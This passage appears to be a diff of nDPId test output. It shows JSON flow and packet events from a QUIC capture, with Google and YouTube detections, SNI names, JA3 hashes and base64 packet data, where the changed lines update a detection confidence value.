x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433588411,"flow_last_seen":1621433588411,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"22.12.150.194","src_port":59965,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433567521,"flow_last_seen":1621433567521,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433648984,"flow_last_seen":1621433648984,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":64693,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} -00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433848159,"flow_last_seen":1621433848159,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":59680,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433588411,"flow_last_seen":1621433588411,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"22.12.150.194","src_port":59965,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433567521,"flow_last_seen":1621433567521,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"9.65.169.252","src_port":60936,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433648984,"flow_last_seen":1621433648984,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":64693,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"}} +00729{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621433521961,"flow_last_seen":1621433521961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433848159,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"16.232.218.117","src_port":64700,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433861442,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1621433861442,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433861442,"pkt":"AAAAAAAAAAEAO9I5CABFAAViZLJAAH4RY5aokEAF2f5sruDdAbsFTnSvyv8AAB0IrXE1PswUxeQAAEU0moW2I5LE8O2RChniUsRu3mGuowplCLtASVZHqsnxug4PsDrEW3Sj\/leTPqj5zsaBrtRlsbN9lOBqairoOcWnpMpgmaHQCpPptKrsTiKLv9DzkKDiiyP+Mqe+\/mlEdOWIT57m\/bm9VRc8tH+phNv28+B7nLrNXNbf+JIcCMe3B97c2i01lE5nP9lOGBndD+gNN+RzjizdPjT7CsIXwfii\/vPw0hQi3TTTCgYsoE3qaYNZIQa7y+ZulLHbauYPh7IRvVbsW6oMX5mqUpOCkwTG7qK3J0PWf+WY+NS17Sud\/qUl+vWLY3nRgL5hCL2d62+ht1MFTAd\/54SptMH7UTOp0SLwM2rzQ7K1vfHvBg0P1XtZu5\/ZPCWf9HzATlzy7lSiJk6IgXbAhRFG1G8fUp4\/ofu+HGCEF\/7UDhsGZrHHdSkUntprrQdJrtC9uwLQHDmvwvf+IflTbSL1rDFYxHI8L4wWpQGIUOrApnE\/9cNQvTN\/qDlFELbRPZMI+sgmXFe1wpxWQvJnUzbEgibgAlOEoK0YMMr00gbYRHnt\/XmwqnfPUMgFPhthy2NaZGYNKqtyo2LV+qQNOXTYs+yqM7Oe60KVRE8NtfRjTThOKaPHFROsWvuzwA+ukNXH9pokuvNAsPejuPAD\/pIIAFoeLo9EdQWTjq8bmJHRJLeQdgOixkkn6ZENEVhcApyT3Cjpyjy6XOyeAvH1rOAqQH1f5XGmtLPBx0PHlTgWwMQNd1EMcY81AvslHkFJ28FdohsGkQMrtF6QnW4yyffpqKjZGXR4Aft\/6zwVouPtFf+c842WgjqV9zAXzrH+Q4FG8Bkm133cuN6x\/UQjBUG9ulPeffB4LFwzJ6cgdlk8sALE9OsSEEFoZ7Kgq2RJG2B4QiAcvJ\/G23JlL4GPLCphHQL+uuXuBJ53c0dwm5IgyJmL+Fkv\/oWmjZHaja9h6d+MuXfjhw22jLCFl4NqE+v2ig\/Upn3KknaXhJpMXjSzUNFPLHancjwMFUrmgiHOiCGbChAN7KNYiHqvDaXEYjnuJfY1oM5mhTGv+oeOS3sb+HmH2iJecdF8bXE2rbafbwa6Uiv9ikM1BTBN7UiXD5IlCeKhBSPAXD2EauGLnJC8pFr5zgHjAQh4mgtnSEZQ0zN3cIdAyuQFOV8jS+\/nBwLOE8x1n4uqLxML18glCa2oWZgACniabrs7r2NaqfObdjspQwzjkU1TDyb5gdlLj\/eHIpfAuefXCBvRbCcBcf3j6IilvS6+AsNo2EQaT9604HtRnmqrZY9SdTX65A28Jmq3pM9OvQ\/TUFf5yYcqxQ9haiwBaX+NvsVDdtRqsd5\/7eI5m8Kz23+blc4m9ONL7svDOPbX8ss3fOhktK2bl8ThuCTTF503OHo06Lwdf8CjZvVZNlx9x5F\/PfM3mGcuSEt3i52BYpDCMhsRFqfjcUkuPmzCH58lXX47a19QYjODRwQE3Q0zKcLxx79OB9EdMQ85AedN\/Yq1ncVuwuxGbXOoZGRxYBpfpp+NMq0YojthjxX0BlTnVyrSw5lnJpqEdmlVw2bcD9yZZWHwXJvKr5qpx\/cr9xPEvlHadBYAjoEENWkL3gQJjVHBrOhAB1uTYhdNnltIi8vWgTzELMZlpUHeqiLODHWpAl4WXW8xnY8PcTaYP+SnKQgJmd43Zakfel6+p23x5PQixUcbkwGMl2kk7UtX\/gGRLqBBO2NRLJN5MePtLUrUVSVwbZY282tQGPil07XxyVmzfQkhzkp4eJ5a\/N1QTFtfiCHdNogD"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433861442,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r2---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861442,"flow_last_seen":1621433861442,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433861442,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"217.254.108.174","src_port":57565,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"r2---sn-vh5ouxa-hjuk.googlevideo.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433861875,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02323{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1621433861875,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433861875,"pkt":"AAAAAAAAAAEAAWXVCABFAAViHWZAAH4R2UiokEAFjzSJEsyjAbsFTgvjw\/8AAB0I4XSW+s91uvMANwAS6GfjW0GMdTsqKMpwqTx337NvtDulmldgfnpNodm4QCw5Bjnjn9W+uBm+YhsF1Trj\/EVP9+xE\/ehiNLKErhY79Fc\/HJEeNp62+UYmQIxnF4BXHeby7saDvvQlaWtUhK2nNgwODZK+JDEtxkUQ\/VybQVP83ATzWc0qLvD8yBtR7czNUAqQeB0mf7V5GtJz0rLXU9erE4DOq5Qs\/9FCIz7bDlqW8m3GqwlAlM\/ShYpSh+i1tk19DnlT9d71cXWxAaBMh3SgHyMdgTEnDOAcddGzDaeO7lK6Q+fWEYvrhEHvLyLGKNSZUeJYxc\/icjZAwxx1JsyytVVfcjM\/mcdecpSw9Bmojler9Rg2Ujayse\/kuXuiAg+1NTMXX33ZL2rhDQtAjmZrBrfEVHGmJy+0cMtd+79bvpVApkexLNObFkVRwaBswWlkZfKVtffBr4kfbBTWyXOmnhO01cFVCjdQL\/BWZouvBCtlDnK59GQE47E\/QE9JjfWDLKIpllBc19+E+UnP0GbmHg\/0unruvB08k6BhVSiKRaeDIjirm9O9wbEuKHWikZtOKgn0vdcW3o49vZELiyS8Oh0eH9i10QOv1F\/ixGOhJ7Q9oRu9TNyMYSO08q0kVm7c2CA73Gt23SuU\/bhClfdnHjyNCfLe1tTbcknZFj\/ikotBSaPjBSmkP\/K1gB+2W38hHc\/pDDGJn\/1HKhUE2jJHeTGdUUEt\/nIx7qb\/Qem+IcovQc0vl5iKASp+ml4MLegR\/yOFMMAwayIHpj4zjxWU8b5eorYjA3a11PNOPq+Diwo4jSkCwWP\/NQrR6of3bBVoaXisVa9wpr4IMIfCHiFcIgOR96+r4oTypl7Gu8zq2gdbwI6YjUXUc52tqJWY3kkxwvYV3OqU8QnVDcS8NgM3sBNbtUWYevWYZ5kG\/xc6I9RBB93tEOa2yK\/MLrNRzd2ly4YTi8cHvLzZ4JO8StA2rNVX7gEP+80+zHm0dnXITPxyYwSedSInn\/pNvSAPgpaQZutI98VHsSgXt2AGJ1MMrh4KLNemtCZ0sd2YqrNsd0v\/Q\/CUZ1ILOe3p+l5wVi9Zn43HdgMKjjQliDoQWt6oPzDKQdarw2zvf2CSBY+WIBwbxkvSJ254+5B740QdtviqaFSVrXzi7RfFwi+ivbVv+NHhY1sdpuJtIIOCprt6WYhs+StriI4nyZAJwcdp32W8aqvb\/1985ZY6u+nxx4f2trOGoh+bHJBuPbElLY3maoHSuOXZ785q+vKdky1ER+vTTeciB3UUV2EsQxGisoRd3HsY14dMPd\/KtnJkfnSo9huSkgv6uqscOmR3O15K2wVr1cJTHHoYe8xmAfEt31ohtVVGBkqoyfKwhTy83VRvvkyyeMMzfXCvOEXQzPUnps\/izhGZQO1uJuDErdBO8cpI3nRLPMCD\/UdOq6K0a\/lUA2\/RmUzFI+l6dkQCJFczxVxFEsgIriEhhycx8gi4LqlH4ujmWOaJbxFhSFcxnusPel+AYrO\/saFdGOX6zbAvXOzVPrMBiZjZC6L4YNHykbx\/ACsbmx2tWJ0UBsImPtqc3VN8uY2G\/l672JNHVL4kWCmPOASo\/9VfXHfz9oDR2A9rIFyPu2yDMiXJyLW7o6SypanBfAjWm99ANW\/QN19miCc22rNTHysZikzeNz6bIeFmyLS3Ngnlk7euJrOCdUrQrLMzQVLmQ\/RtVvjMOEklG0mmb1U0vbtTHQFDaG3odQNuXNPFHDfi8wFpWHR9i\/WEKv+nJwW23RrP6NiuaqLXBX+0"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433861875,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433861875,"flow_last_seen":1621433861875,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433861875,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"143.52.137.18","src_port":52387,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"pagead2.googlesyndication.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00602{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":71,"packets-processed":70,"total-skipped-flows":0,"total-l4-payload-len":94500,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":58,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":58,"total-idle-flows":55,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":248,"global_ts_msec":1621433949433} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433949433,"flow_last_seen":1621433949433,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433949433,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":49860,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02314{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1621433949433,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621433949433,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi\/AZAAH4RFwGokEAFcfqJ88LEAbsFTrCcz\/8AAB0IOpZExBi7cWoANwDL9uHaA0kckkofYv0DErOJu7gbuZ9O0WlrHu9XY7EghfeNZiWwbeaMEG1HVz2HXjvb7FiIQLhE\/XrtpQvuu\/3Omn1Xc2On2DZgH7f6oOHpbPUOYpms0\/qyqv6hTxaVN8Qyf9zFprmCdbR0TKFMTov\/mcwAhmtaqiJQOX1idcPmDuEg7iPhXhQ9Rg3RwrAk9BrfJvQxFfeEOMteWZD4MyDZ+yV9SiAuwwh+aqsiPNuxGOL+UtAzKQsqxym7hzR1q28tmGh+i2Zfk\/fZfni9+9jCbMGXciLv74dlIT7PTJbDgcbiIKwlBsLy\/knykvOWyjY094BIkBXk3yU5NleET3fprZZxZhV8ZWXPFIPEaF+RU6Htv70MXhBjSUlUKboeasdJJiERx9PP\/FOQwZ9brIMVelncnCNFZ46nArIPtPpuAd\/21AcBQuAfrDAMwGty4EHlw\/4EpTckdi6e8Q1HZa8uOZS8L8Br1Me9zLoyL4ZjxYSKprCH0SP1KvhqYL3GHK4Qay7ZVNjLEb+G56Co2cVZ6Z8h9R\/Vb5Kkek+Pkji+2fhLMmeX7GKMME7SjXSMGgLh6kG9e35UGvMzTHWm2oiUJJo5etspIs8CqI2hin1wFD6+4iM6vgMpZ1\/0hibOtrqATrfcRXn\/g3FcL\/RO\/V+7mXSO42YkAYxLa84v0N\/qNcWbspbFv6UUuZtGqJZj6gNVEV6zKBOfhdaZA6YCWC4HGrFtWO5PpwwVCgG3aalQZk8NUuhTNMXowyvh9L18LCMzCzLXkkowVa1Yrk+ACBdqcZ0NdAszss2Z\/EjjNmNifpEEEqUfgXYXLLAXFUhdn9KTgkgQJb6GidRjtio+hiOES7K\/Zd7kR9Rp9Q8wDhX+D6mhrqnUubbVrqMcM5J\/ZatN2j1E7+O4tATjd9IDFwcw4kKULkoQtjBOYHy1h\/oATwVF+VEEk5TAZlZMx5wT0IH9U8MEWVD8KooUS4KhPU7qWcQbSeYILfK051yDU8v1p35RNAMARwMz+aDEiPOl1NvT3vNB0NKpyA8dp2SOTKCt+U38vG+GnQA9V62d7ZUKYJ3KlxmDU6XA53hOV25AFsiPuoW6Iyhmf6HsaasYpE\/s6FIsRYPDWGHRq1MdouHttvkvAO+x3GFakZh3SiKhTE80kxe41OgEyoVuUyhRjr87DNUuENvzYlvEniWFEMpKV3srA\/SEnULC+0Ec4J3ujljBaufKdfF8SZpoN9j7BrC+MAqJq3d3VhpBG26mGJXkkc4FOZBB0fM\/Lhy0kTI83pcFnGWjj7XjivhZl42l7vBIKLjvLvvCQDgRAJQidieJyJhRuZYNfeY8eJjBRqpIKNqtcSkkmENkCxAYMCiOc0b0eIGuyHwfWl9DZKgiIkTs1P8VjoiaVtyxt\/mMFzkrdTau0IQVNDUvaqFADarA4i6F5X\/ztcJlv95UshqbL5rcKZuqHaDiKMW08lYpiumS+l0yCHCZdSG\/JKiFlfvCQuuO7wI8YM6N7g2OYZA0jS7vIYCufcCVOzadPPeliEKT+SdqnyQb1rT\/MrPC4qmZRKIvY7jNy8gfCXgs7p4XgbHvnaS7Dr9uRFum4Sn9Lk+LXgtcZE6ZRI7CQvZwF9N6AC\/1sN8XoPIf\/S8UYH\/UrL8QIB2dvW8d4m9grwcwhaVNrzDuYlH1t5w04qvmeO0jLTMXCRV\/LhJb7I6BPjU9fi6dVMzhz3YRA0knZgi9sfYpy0b4laLv5IQhdo7jIDxnDb0cqwQffN65VEIrS8UKXodV6nKpQ21X"} -00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433949433,"flow_last_seen":1621433949433,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433949433,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":49860,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00930{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621433949433,"flow_last_seen":1621433949433,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621433949433,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":49860,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"b1.nel.goog","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621434024831,"flow_last_seen":1621434024831,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621434024831,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":60949,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1621434024831,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621434024831,"pkt":"AAAAAAAAAAEAO9I5CABFAAVijfVAAH4RD4yokEAFubq3ue4VAbsFTpL9z\/8AAB0IwEpXITGNfFsANwCxWhQSYIUF\/WvpOS2d24m86qS7bcPY9ZqXL9ETLTiw416RPBiWWmatxUNDS4V+myDEXn29IuVE\/cSbBImAl6aiOQIEBTB\/SXbMixQXFNoJB8yYQYz6wms++ZMMx\/E4BhzwHBpTBXPh7b4mD3YSWE+XxUv9H9L2UZXkzlxf97xn0ny\/fPI\/0BBls5vpYFjJSYZYoIlr6vhdm\/ebeHlyzz6B8ygezIiK3UwVDadwbjMZG9Omuh7X1DhVgs3vz1W21fFGWXozYn3VF